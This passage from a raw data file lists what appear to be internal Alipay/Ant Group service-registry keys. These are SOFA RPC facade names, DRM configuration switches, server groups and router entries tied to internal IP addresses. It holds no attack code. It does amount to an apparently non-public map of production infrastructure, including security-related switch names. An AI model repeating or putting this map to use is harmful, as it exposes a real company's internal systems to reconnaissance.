CategoryCandidateService:1.0:landlordgame_antTown@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_YUNPUSH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zskynet:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbaservice.common.service.facade.businesstype.api.BusinessTypeMapManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkpromocore_approveSuccessBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.product.VcpVoucherProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paydecision.CacheManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucns.common.service.facade.MaiClientStatisticFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csoperationmng.service.facade.api.ChatMonitorQueryService:1.0.0:csoperationmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.growthplus.ai.AnalysisCrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cifcommon.business.platform.useragreement.drm.UserAgreementClientSwitch.queryRpcSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:assetfluxdecision.product.fluxDecisionProduct.refund@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.DaoWeiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.category.CategoryVideoListManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mbill.common.service.facade.MbillDataExportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.144.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insusercenter.client.policyfold.extension.PolicyFoldInfoFetcherComponent:1.0:inshealthcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MOBILEGEOCODING#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.security.dresource.SecurityCommonDrm.totalUrlDecodeTimes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ecoqltprod.common.service.facade.tinyapp.TinyappExperienceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:frlabcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fincommontaskhub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:pcloanpayprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.pneumonia.rpc.PneumoniaRpc:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtemplate.common.service.facade.assemble.ScriptAssembleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskdepict.common.facade.RdFeatureQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.api.ShopVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apyunqing.facade.AppDeployParamFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:pcreditpay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custrelationCzoneTairCache_dest.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.BPInstanceFacade:1.0:zmprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.200.192#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instriskcenter.facade.api.NumberRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:yunfengdieproxy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.HealthAwardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:rcdmncore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.serverless.base.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zonemng.query.facade.api.ZoneMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.charge.obwriteconfig.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_C_ZPERF#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.accrmcore.common.service.facade.CustomerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.sfa.api.SfatransAssetLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","matcher.RuleMatcher:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainbankloan.facade.api.query.FinancingQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileic.matrix.service.facade.spi.StrategyGroupServiceProvider:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditrmp.facade.OperateTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.comprehensive.insmobile.insmobileConfDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:sffgroup-ares@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","finfundmng@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.opinioncore:name=com.alipay.common.webx.session.drm.SessionLogDrm.formtokenSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchishub.common.service.facade.api.EventConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:context-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.tag.ItemTagConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:bktradecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchcommerce.fmcgcore.common.service.facade.category.api.CategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fundcardprod.common.service.datatransfer.DataTransferNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.service.facade.taobao.H5AutoLoginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.FaAccountInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.130#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cifcommon.uniquery.facade.UniQueryService:1.0:cif_cz@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.ProcessInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:pure_zmopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antforest.common.service.facade.triple.Double11CertFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.riskmng_riskmngDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.mohelper.common.service.facade.HelpRouteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:agootwa#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.dataphin.resource.common.facade.api.FileSearchOpenService:1.0:dpresource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.biz.service.account.monitor.CfpAccountMoniotrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_gfcenter_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchasset.common.service.facade.common.AssetSupplierPortalUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.airmng.common.service.facade.specialpartners.AirSpecialPartnersFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.archimedes.common.service.facade.api.ArchimedesCallInService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkpayplatform.common.service.facade.api.agreement.AlipayEntrustAgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_FINPROMO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:promoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.kbjob.KbStaffActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kmi.common.service.facade.AppFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acpmscore.facade.ConfigItemFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.fcrcportal:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.prodtrans.senior.query.facade.ProdtransQueryExtPropFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.content.ContentTopicRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.UserTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0:services@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.postmen.api.MessageApi:1.0:intl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpunish.common.service.facade.control.ControlEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfarm.common.service.facade.ActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.PublicWelfareWeekFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.service.integration.fundselling.PartnerProfilesQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ideploy.common.service.facade.workspace.WsEventManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmobile.common.service.facade.card.mng.CardOptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.logDegradeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agdscc.common.service.facade.memberlabel.AgdsccMemberLabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.246.242#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zcb:name=com.alipay.fundselling.common.drm.MigrateSwitchDrm.bidNotWithdrawalInAdvanceInstListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imdopunit.facade.api.imdb.ImdbMerchantService:1.0:imdb_cn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.open.doc.DocServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mif_picAutoAuditCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.prepaidcard.api.PctransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.dchain.common.facade.api.contract.ContractService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signExpireEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.treedict.TreeDictService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imif.common.service.facade.v2.ContactPersonQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.repository.AppointmentConfRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.admin.ThingShadowAttrAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontentrp.common.service.facade.ContentHbaseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.192.29#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_O_CIF#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.rpartner.service.facade.RigelLinkManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:@86842598-80102053-uniqueId-104003025.antscanner.global.alipay.com@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.registry.ConfregRegistryServiceTest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finsnsbff:name=com.alipay.finsnsbff.topic.isTinyTopicDetailDowngradeComments,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_F_FCRESERVECENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.4.238#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.findatacanal.common.service.manage.gildata.QsDailyQuoteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pushcore.facade.PushApnsAppsGzoneFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTairRz.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.Arch:name=com.alipay.xts.ElasticSwitcher.elasticRuleForLoadTestNew,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityexprod.biz.lisa.service.alipayauth.EntOperatorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.shared.activity.drm.SceneActivityDrm.activityWhiteListUsers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promox.facade.table.TableFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:lifeexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.antha.ha.AnthaUpdateTableManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acauthcore.common.service.facade.manager.TranslationManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.cashback.service.facade.CashBackMallSearchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.SelectUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.pointprod.common.util.resource.PointCapacityDrmResouce.compatibleQueryPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bksupplychainprod.common.service.facade.ticket.api.ScpTicketCreditApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.biz.shared.split.lock.LockAdminService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rdf.gray.config.facade.service.RdfGrayConfigQueryService:1.0:finfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.equity.common.file.facade.FileToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.common.service.facade.api.PersonCharacterRiskQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CertifyLimitService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.afwrobottwa:name=com.alipay.afwrobottwa.emergency.disableCheckExp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbservindustryprod.common.service.facade.reservation.ExchangeCertificateManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.facade.api.AssistantService:1.0:csplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.core.dal.service.DVMetaDALService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.152.129#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.linkede.metacenter.rest.ModuleRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkmportal.service.loan.securiy.SecuriyVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_ALIPAY_RATE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.fincommonbff:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccountRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipayplus.gmp.openplatform.facade.AppQualityServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scsupport.common.service.facade.rdfgray.GeneralConfigurationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.allowHostUrlList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:shopOperatorMerchantRelationValidator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_APSHOPCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.product.common.service.api.view.ConfigRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsmmg.common.service.facade.axel.OdpsServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcplan.common.service.facade.api.PlanQueryFacade:1.0:MYBANK-PROD@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.mide.common.service.facade.api.branch.CicadaMBranchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:finannafccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finresprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVip-JavaClient:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.supergw.service.facade.transaction.MessageAssembleService:1.0:supergwicbc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infostudio.facade.mng.category.mapping.CategoryMappingMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membercenter.service.facade.PasswordService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-koisemiousdemoxxy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.iotcore.api.TopicApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.cfpcenter:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdeduct.common.service.facade.agreement.spi.callback.PayAuthManageCallBackService:1.0:yebsas@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.facade.service.P2pDisclosureAuditManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.service.facade.PointConsultService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gclearingcenter.facade.api.GclearingSettlementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.artisan.facade.component.ComponentFacade:1.0:mrchservbase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.AttachmentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdFieldQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.securitysimulate.common.service.client.drm.SimulateFlowResource.methodFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.160.149#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbpunish.common.service.facade.event.api.ComplaintEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniselfop.facade.api.selfopact.SelfOpActUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.131.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sdaxconnectplatform.common.service.facade.xphub.XpBindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.busriskdec.facade.riskcheck.services.SceneAssembliesQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fixedOptionalDepositProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.91.178#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.unitestcenter.common.service.facade.api.DispatcherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.cif.client.drm.TairToTbaseSwitch.switchToTbase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.common.service.facade.risk.RiskDefenseQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.darwin:name=com.alipay.darwin.sdk.config.oss.accessKeyId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.biz.service.impl.schedule.GroupBuyingTaskDRM.splitTaskNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloudatlas.accatracequery.facade.TraceLogDigestQueryService:1.0:NavySeals@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.252.99#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publiccore.common.service.facade.account.OfficialAccountRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.barcodeprod.common.service.facade.code.CodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.securitysimulate.common.service.client.drm.SimulateFlowResource.floodingFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditauthprod.service.facade.PreAuthCumulativeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.152.86#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:filecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerops.facade.api.RuleEngineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.74.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.oceanbase.obforumcore.service.open.activity.ActivityBannerOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echo.platform.playback.service.EchoPlaybackService:1.0:assetfluxdcsmirror@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxlib.common.shared.facade.spi.ContentRiskPerceptionSimulateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.imif.common.service.facade.api.MerchantClassificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapi.client.SystemAppInvokeService:1.0:custweb@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.zmcreditdrmservice.prodScoreStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:itemExclusiveMessageSender@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.236.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antmember.common.service.facade.membertask.MemberTaskCustomerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csactive.common.service.facade.mng.service.DingTalkService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.application:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.businessPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_HABASELINE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundPeriodAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.AntPassportSwitcher.expireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.